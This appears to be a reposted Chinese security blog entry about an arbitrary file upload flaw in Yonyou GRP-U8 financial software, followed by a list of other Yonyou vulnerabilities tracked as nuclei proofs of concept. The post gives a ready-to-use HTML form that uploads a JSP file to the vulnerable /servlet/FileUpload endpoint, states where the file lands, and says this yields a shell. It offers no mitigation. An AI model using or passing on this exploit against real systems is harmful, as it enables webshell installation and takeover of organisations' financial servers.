文章简介
网络测绘
演示过程
用友GRP-U8 财务管理软件servlet存在漏洞,可通过GET参数fileName控制上传的文件名
/servlet/FileUpload随便构造一个表单,上传任意文件即可
<html><form method="post" action="http://xxxx/servlet/FileUpload?fileName=t.jsp&actionID=update" encType="multipart/form-data"><input type="file" name="rfile_name"/><input type="submit" value="upload"/></form></html>
上传后的最终路径为:
/R9iPortal/upload/xx.txt
可直接getshell
nuclei-pocs
用友漏洞待更新记录(已更新16)
-
用友 U8 OA test.jsp SQL注入漏洞
-
用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)
-
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
-
用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
-
用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
-
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
-
用友 NC NCFindWeb 任意文件读取漏洞
-
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
-
用友 GRP-U8 UploadFileData 任意文件上传漏洞
-
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
-
用友nc 控制台绕过漏洞
-
用友 NC 系统 uapws wsdl XXE(2022hw)
-
用友时空KSOA软件前台文件上传漏洞(2022hw)
-
用友nc v6.5 反射型xss
-
用友nc接口信息泄露漏洞
-
用友GRP-U8 财务管理软件servlet
-
用友 NCCloud FS文件管理SQL注入
-
用友nc v6.5 反序列化漏洞 补丁绕过
-
用友nc v6.5 反序列化漏洞
-
(CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞
-
用友nc IUFO v5
原文始发于微信公众号(北极星sec):用友GRP-U8 财务管理软件servlet nuclei
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论